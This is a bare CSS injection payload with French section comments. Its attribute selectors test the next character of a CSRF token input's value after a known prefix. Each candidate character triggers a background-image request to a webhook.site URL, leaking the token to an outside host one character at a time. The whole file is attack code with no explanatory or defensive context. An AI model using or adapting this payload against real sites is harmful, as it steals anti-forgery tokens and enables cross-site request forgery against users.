/* Minuscules */
input[name=csrf][value^="ruW-tjL1BWCdha"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?a); }
input[name=csrf][value^="ruW-tjL1BWCdhb"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?b); }
input[name=csrf][value^="ruW-tjL1BWCdhc"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?c); }
input[name=csrf][value^="ruW-tjL1BWCdhd"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?d); }
input[name=csrf][value^="ruW-tjL1BWCdhe"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?e); }
input[name=csrf][value^="ruW-tjL1BWCdhf"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?f); }
input[name=csrf][value^="ruW-tjL1BWCdhg"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?g); }
input[name=csrf][value^="ruW-tjL1BWCdhh"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?h); }
input[name=csrf][value^="ruW-tjL1BWCdhi"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?i); }
input[name=csrf][value^="ruW-tjL1BWCdhj"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?j); }
input[name=csrf][value^="ruW-tjL1BWCdhk"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?k); }
input[name=csrf][value^="ruW-tjL1BWCdhl"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?l); }
input[name=csrf][value^="ruW-tjL1BWCdhm"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?m); }
input[name=csrf][value^="ruW-tjL1BWCdhn"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?n); }
input[name=csrf][value^="ruW-tjL1BWCdho"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?o); }
input[name=csrf][value^="ruW-tjL1BWCdhp"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?p); }
input[name=csrf][value^="ruW-tjL1BWCdhq"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?q); }
input[name=csrf][value^="ruW-tjL1BWCdhr"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?r); }
input[name=csrf][value^="ruW-tjL1BWCdhs"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?s); }
input[name=csrf][value^="ruW-tjL1BWCdht"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?t); }
input[name=csrf][value^="ruW-tjL1BWCdhu"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?u); }
input[name=csrf][value^="ruW-tjL1BWCdhv"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?v); }
input[name=csrf][value^="ruW-tjL1BWCdhw"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?w); }
input[name=csrf][value^="ruW-tjL1BWCdhx"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?x); }
input[name=csrf][value^="ruW-tjL1BWCdhy"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?y); }
input[name=csrf][value^="ruW-tjL1BWCdhz"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?z); }

/* Majuscules */
input[name=csrf][value^="ruW-tjL1BWCdhA"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?A); }
input[name=csrf][value^="ruW-tjL1BWCdhB"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?B); }
input[name=csrf][value^="ruW-tjL1BWCdhC"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?C); }
input[name=csrf][value^="ruW-tjL1BWCdhD"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?D); }
input[name=csrf][value^="ruW-tjL1BWCdhE"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?E); }
input[name=csrf][value^="ruW-tjL1BWCdhF"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?F); }
input[name=csrf][value^="ruW-tjL1BWCdhG"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?G); }
input[name=csrf][value^="ruW-tjL1BWCdhH"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?H); }
input[name=csrf][value^="ruW-tjL1BWCdhI"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?I); }
input[name=csrf][value^="ruW-tjL1BWCdhJ"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?J); }
input[name=csrf][value^="ruW-tjL1BWCdhK"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?K); }
input[name=csrf][value^="ruW-tjL1BWCdhL"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?L); }
input[name=csrf][value^="ruW-tjL1BWCdhM"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?M); }
input[name=csrf][value^="ruW-tjL1BWCdhN"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?N); }
input[name=csrf][value^="ruW-tjL1BWCdhO"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?O); }
input[name=csrf][value^="ruW-tjL1BWCdhP"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?P); }
input[name=csrf][value^="ruW-tjL1BWCdhQ"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?Q); }
input[name=csrf][value^="ruW-tjL1BWCdhR"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?R); }
input[name=csrf][value^="ruW-tjL1BWCdhS"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?S); }
input[name=csrf][value^="ruW-tjL1BWCdhT"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?T); }
input[name=csrf][value^="ruW-tjL1BWCdhU"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?U); }
input[name=csrf][value^="ruW-tjL1BWCdhV"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?V); }
input[name=csrf][value^="ruW-tjL1BWCdhW"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?W); }
input[name=csrf][value^="ruW-tjL1BWCdhX"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?X); }
input[name=csrf][value^="ruW-tjL1BWCdhY"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?Y); }
input[name=csrf][value^="ruW-tjL1BWCdhZ"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?Z); }

/* Chiffres */
input[name=csrf][value^="ruW-tjL1BWCdh0"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?0); }
input[name=csrf][value^="ruW-tjL1BWCdh1"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?1); }
input[name=csrf][value^="ruW-tjL1BWCdh2"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?2); }
input[name=csrf][value^="ruW-tjL1BWCdh3"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?3); }
input[name=csrf][value^="ruW-tjL1BWCdh4"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?4); }
input[name=csrf][value^="ruW-tjL1BWCdh5"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?5); }
input[name=csrf][value^="ruW-tjL1BWCdh6"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?6); }
input[name=csrf][value^="ruW-tjL1BWCdh7"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?7); }
input[name=csrf][value^="ruW-tjL1BWCdh8"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?8); }
input[name=csrf][value^="ruW-tjL1BWCdh9"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?9); }

/* Caractères spéciaux */
input[name=csrf][value^="ruW-tjL1BWCdh-"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?-); }
input[name=csrf][value^="ruW-tjL1BWCdh_"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?_); }
input[name=csrf][value^="ruW-tjL1BWCdh."] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?.); }
input[name=csrf][value^="ruW-tjL1BWCdh~"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?~); }
input[name=csrf][value^="ruW-tjL1BWCdh!"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?!); }
input[name=csrf][value^="ruW-tjL1BWCdh@"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?@); }
input[name=csrf][value^="ruW-tjL1BWCdh#"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?#); }
input[name=csrf][value^="ruW-tjL1BWCdh$"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?$); }
input[name=csrf][value^="ruW-tjL1BWCdh%"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?%25); } /* % encodé */
input[name=csrf][value^="ruW-tjL1BWCdh^"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?^); }
input[name=csrf][value^="ruW-tjL1BWCdh&"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?&); }
input[name=csrf][value^="ruW-tjL1BWCdh*"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?*); }
